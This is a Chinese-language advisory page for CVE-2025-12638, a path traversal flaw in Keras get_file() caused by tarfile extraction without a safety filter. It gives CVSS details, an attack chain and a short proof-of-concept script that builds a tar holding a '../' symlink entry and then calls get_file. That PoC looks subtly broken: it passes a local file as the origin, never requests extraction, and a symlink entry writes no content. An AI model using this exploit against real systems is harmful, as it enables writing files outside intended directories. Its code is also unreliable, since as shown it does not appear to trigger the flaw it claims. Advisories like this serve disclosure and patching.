CVE-2025-12638 Keras get_file()路径遍历漏洞

披露日期: 2025-11-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12638

漏洞类型

路径遍历

CVSS评分

8.0 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Keras

漏洞概述

Keras 3.11.3版本中的get_file()函数存在路径遍历漏洞。攻击者可通过构造恶意tar档案，利用tarfile.extractall()方法在解压时绕过安全检查，将文件写入目标目录之外的位置。

技术细节

该漏洞源于get_file()函数使用tarfile.extractall()时未指定filter='data'参数，导致攻击者可利用符号链接或特殊路径字符实现目录遍历。

攻击链分析

STEP 1

攻击者创建包含路径遍历payload的恶意tar档案

STEP 2

通过get_file()函数触发漏洞

STEP 3

文件被解压到目标目录之外

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import tarfile
import os

# 构造恶意tar档案
with tarfile.open('malicious.tar', 'w') as tar:
    # 创建指向父目录的符号链接
    info = tarfile.TarInfo(name='../malicious.py')
    info.type = tarfile.SYMTYPE
    info.linkname = '/tmp/malicious.py'
    tar.addfile(info)

# 利用漏洞
from keras.utils import get_file
get_file('extracted', 'malicious.tar')

影响范围

Keras < 3.11.4

防御指南

临时缓解措施

立即升级Keras版本或应用官方补丁

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表